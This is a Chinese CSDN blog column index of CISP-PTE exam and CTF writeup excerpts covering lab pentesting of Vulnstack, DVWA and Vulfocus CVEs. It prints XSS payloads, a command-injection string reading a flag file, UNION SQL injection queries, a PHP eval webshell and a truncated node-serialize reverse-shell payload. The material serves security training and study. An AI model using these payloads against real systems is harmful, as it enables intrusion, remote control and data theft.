![](https://img-blog.csdnimg.cn/2019091813595558.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
CISP-PTE实战模拟
文章平均质量分 69
这个专栏我会偏向基础多一些,同时也会涉及到一些ctf题,理论+实战,让阅读者更容易学懂;在CISP-PTE考试中,题型大多都不会难,更多的是知识层面广泛,平时可以多做做CTF的基础题,对考试有一定的帮助。
beirry
这个作者很懒,什么都没留下…
展开
-
红队攻防知识分享-红日安全团队靶场1
环境搭建靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/环境拓扑图:以下是虚拟机网络配置虚拟机网络配置Windows7 x64VMnet1:192.168.52.128;VMnet2:192.168.54.128Win2k3 MeasploitableVMnet1:192.168.52.141Windows Server 2008 R2 x64VMnet1:192.168.52.138kaliV原创 2022-03-23 13:33:51 · 8190 阅读 · 1 评论 -
红队攻防知识分享-红日安全团队靶场1-速通版
此版本是根据日常实战中来渗透攻击,如果为了学习,建议先看学习版本外网打点端口扫描通过扫描端口得知web站点开启目录扫描得到用的数据库是mysql和一个站点的备份文件通过文件包拼接得到站点url:http://192.168.54.128/yxcms,使用的cms是yxcms,版本为1.2.1知道yxcms,直接百度找已知漏洞访问站点后台,尝试默认密码admin,123456通过百度得知,编辑前台模板的功能可以插入一句话木马,则直接拿webshell,获取路径,直接在备份包里搜索前台原创 2022-04-14 12:36:08 · 3044 阅读 · 0 评论 -
二向箔-百日打卡 writeup 6-10
NO.6点击start并无反应,看看源代码是跳转到哪里再看看网络模块,点击的时候是发生了什么点击时start,看到index页面的状态码是302,那么我们大概就知道是一个这样的流程,访问index时跳转到了hello。那么我们用burp抓个包,看看响应包,将抓到的包放入repeater模块,点击发送在浏览响应包时,发现flagNO.6这道题没有提示,就随意发挥了首先能访问的按钮都点一点,做一波信息收集。以下是我收集的能跳转的url,已过滤不主要的业务。第三,四个功能模块是我们主要要测试原创 2021-12-05 00:23:44 · 299 阅读 · 0 评论 -
二向箔-百日打卡writeup 1-5
NO.1点击提示按钮,可以看到我们需要以admin登录此处已经有一个默认账号了,还有一个注册按钮,尝试先登录默认账号。通过观察,看到cookie中有test字样,将test修改成admin,再刷新。登录成功!...原创 2021-12-02 15:08:26 · 1078 阅读 · 0 评论 -
关于网络安全设备总结
关于网络安全设备总结这里只是介绍一下这些网络安全设备的定义,功能,以及它提供了哪些安全性功能,理论偏多。路由器路由器其实就是连接多个使用相同协议网络的设备,它的作用主要在网络层(OSI七层模型、TCP/IP四层模型)。它可以确定网络流量可以采取的最高有效路径。用现实生活来比喻就是我们从家里到学校中选择最快的那条路到达学校。大部分的路由器不会转发广播流量,如果不懂网络的话可以看看网络的一些知识点。安全相关:路由器中有个访问控制列表,就是阻止或允许流量的规则列表。路由器可以通过访问控制列表来过滤网络原创 2021-11-30 15:25:44 · 5016 阅读 · 0 评论 -
二向箔-百日打卡writeup21-25
NO.21xss弹窗测试直接填入<img src=x onerror=alert(1)>发现并没有弹窗,则打开F12看下情况,可以看到被value包含了,那么可以在输入框这样写,“ onkeydown="alert(1)回车可以看到我们输入的值被当作标签内容了在输入框按下一个字则会弹窗,也可以尝试下用onkeyup,当你在输入框中手指按下一个键放开时,则会弹窗NO.22这个标签也是输入标签,那么可以直接跟上题一样,双引号闭合前面的值,再输入οnkeyup=alert(1)//,也就是原创 2021-12-08 17:46:35 · 4066 阅读 · 0 评论 -
二向箔-百日打卡writeup 11-15
NO.11根据提示可以知道是未授权访问登录默认账号跳转到这个页面,我先检查了一下按钮,发现都点不开,结果是发现<a>根本就没有写链接往下滑,看到只有三篇日记,点击More进去看看一般日记都是一些私人敏感的事件,那么尝试去看4的日记修改url:https://rimovni.exeye.run/ne/diary/4得到flagNO.12这个提示也是非常明显了,就是测试xss无疑了直接测试<img src=x onerror=alert(1)>触发弹窗NO.1原创 2021-12-07 14:35:10 · 253 阅读 · 0 评论 -
CVE-2017-5941 (nodejs 代码执行)
vulfocus-nodejs 代码执行 (CVE-2017-5941)复现环境攻击机(192.168.95.58)靶场环境(10.3.61.69)复现过程在含有nc文件目录下打开两个cmd,监听8888端口nc -lvp [端口]访问环境:http://10.3.61.69:55269账号随意输入,密码构造payload如下_$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >&原创 2021-11-24 17:07:25 · 1199 阅读 · 0 评论 -
二向箔-百日打卡writeup16-20
NO.16还是登陆页面提示也很明显了,首先要注册一个admin账户,将admin=true一同发往服务端进行注册admin用户。得到flagNO.17看到&& ||很明显这道题是要命令执行了点击Get Ready,看到这个是利用GET传值方式传值那我们直接构造?domain=--version|cat /tmp/flag.txt得到flagNO18一开始以为是关于sql读取文件来获取内容结果尝试输入单引号,并不是报关于sql的错误那又很明显是命令执行了,输入|原创 2021-12-08 16:19:17 · 241 阅读 · 0 评论 -
二向箔-百日打卡writeup26-30
NO.26按照提示来依次访问one,two,three访问two时则弹出了以下内容尝试sql注入,输入one'%23正常回显(%23是#的url编码,前端不会把#以及#后的内容传输到后端,所以要经过url编码才能传输)判断显示位order by [number]%23到5则报错,说明只有4个显示位查看显示位-one' union select 1,2,3,4%23查表-one' union select 1,2,3,group_concat(table_name) from informa原创 2021-12-20 11:33:04 · 360 阅读 · 0 评论 -
CVE-2020-25790(typesetter 文件上传)
vulfocus-typesetter 文件上传(CVE-2020-25790)从web端进入CMS,点击已上传的档案页面准备test.php文件,文件内容如下<?php @eval($_POST['cmd']);?>//一句话木马,$_POST的值是webshell密码将test.php上传到该页面,出现报错,报错内容是permission denied.将test.php压缩成zip文件,再次上传上传成功,解压test.zip文件test.php文件解压成功获取t原创 2021-11-24 17:27:36 · 1263 阅读 · 0 评论 -
CISP-PTE 实操综合题分享
环境可以在这里下载:https://download.csdn.net/download/beirry/87272606原创 2022-12-13 15:53:57 · 1445 阅读 · 2 评论 -
CISP-PTE 基础讲解
此篇文章是写给对于对安全行业的术语没有一个了解的初学者。原创 2022-12-09 23:58:40 · 1169 阅读 · 0 评论 -
CISP-PTE 信息泄露
信息泄露在当今网络上也是非常常见的,敏感信息泄露通常是高危漏洞起步,普通信息泄露通过结合其他漏洞也能达到高危漏洞的效果。敏感信息泄露包括但不限于源代码压缩包泄漏、SQL 注入、越权或者直接获取大量用户、员工信息。普通信息泄露包括但不限于未涉及敏感数据的 SQL 注入、影响数据量有限或者敏感程度有限的越权、源代码或系统日志等信息泄露。轻微信息泄露包括但不限于路径、SVN 信息泄露、PHPinfo、异常和含有少量敏感字段的调试信息、日志打印及配置等泄露。原创 2022-12-09 23:05:31 · 395 阅读 · 0 评论 -
CISP-PTE XSS进阶实战+Bypass绕过技巧
通过上篇文章,我们对xss的三种类型以及利用方法有一个大概的了解了,那么接下来我们会讲讲该如何利用xss获取个人信息。还是以DVWA靶场,获取cookie为例子:这里用了kali来做为我们接收cookie的服务器,需要先在kali上开启apache。受害机能访问到kali即可。跳转到/var/www/html/下,新建一个php文件,文件内容如下:返回到html目录下,给html一个777权限,防止实验失败。打开dvwa反射型页面,用low等级测试。POC我们在上一章已经验证过了,就不再验原创 2022-06-13 16:44:58 · 1298 阅读 · 0 评论 -
CISP-PTE XSS基础
同源策略百度:同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。同源的意思是指域名,协议,端口相同。不同源的客户端脚本(JavaScript,actionscript)再没明确授权的情况下,不能读写对方的资源。如果两个页面的协议,端口和域名都相同,则两个页面具有相同的源。以百度为例:https://www.baidu.co原创 2022-06-02 12:25:51 · 975 阅读 · 0 评论 -
CISP-PTE SQL注入 进阶篇之实战模拟
此次实战模拟的靶场为DVWA,将等级调为MediumMedium这是由POST传值传输数据用Hackbar来传输POST,id=2,则数据更新,说明id是我们的注入点判断类型输入1 and 0#,无返回值,则是数字型判断显示位从order by 1#输入到 order by 3#开始报错,则显示位只有2位查看显示位输入-1 union select 1,2#,看看1,2会出现在哪个位置查表输入-1 union select 1,group_concat(table_name原创 2022-04-18 20:17:36 · 532 阅读 · 0 评论 -
CISP-PTE SQL注入 进阶篇 Bypass绕过技巧
相信大家看完入门篇后,基本掌握了SQL注入的语法,那么这章主要讲下Bypass的绕过技巧过滤引号当注入点过滤引号时,我们可以用Hex encoding或者CHAR() Function绕过假设有一个查询语句为select * from user where id='[我们输入的值]';Hex encoding原查询语句select * from user where id=‘0x312723’;解析为select * from user where id=‘1’#';CHAR() Functi原创 2022-04-15 14:16:43 · 3796 阅读 · 2 评论 -
CISP-PTE SQL注入 入门篇之实战模拟
此次实战模拟的靶场为DVWA,将等级调为low判断类型判断是否为数字类型1 and 0#,如果是数字类型,点击提交会报错。没报错,很明显不是数字类型,尝试字符类型1',如果页面报错,则是字符类型。判断显示位输入1 order by 1#一直输入到1 order by 3#,报错了说明显示位只有2个查看显示位-1' union select 1,2#将前面的1置空(无法查询到信息就可以了),查找显示位查看数据库信息-1' union select database(),@@vers原创 2021-12-22 17:26:23 · 737 阅读 · 0 评论 -
CISP-PTE SQL注入 入门篇
经过上一篇的文章,相信大家也初步掌握了sql语句,现在我们就来学习SQL注入的攻击语句。mysql在版本5之前,只能通过盲注来获取数据,mysql在版本5以后,可以获取信息的方式就很多了,因为含有默认的库:information_schema,这个库存储着mysql的结构信息。我们通过这个库来获取数据表名,字段名。判断查询类型select * from users where id=1这个语句意思是查询users表中id为1的所有字段,当我把这个id的字段挖空,让这个字段可以用户自己输入。那么攻击原创 2021-12-21 17:32:05 · 1451 阅读 · 0 评论 -
CISP-PTE SQL注入-基础篇
在CISP-PTE考试中,题型大多都不会难,更多的是知识层面广泛,平时可以多做做CTF的基础题,对考试有一定的帮助。原创 2021-12-08 15:45:14 · 4036 阅读 · 0 评论 -
CISP-PTE认证实操模拟题分享
CSIP-PTE安全认证实操题有五道web题,一道综合题,这篇文章只分享5道web题,此靶场为模拟靶场。SQL注入通过页面提示,我们要利用sql注入读取/tmp/360/key文件,读取的话就要用到load_file命令来去获取文件信息![在这里插入图片描述](https://img-blog.csdnimg.cn/799462259f964b289ea74daadf2e6ccf.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2原创 2021-12-02 09:31:43 · 7424 阅读 · 2 评论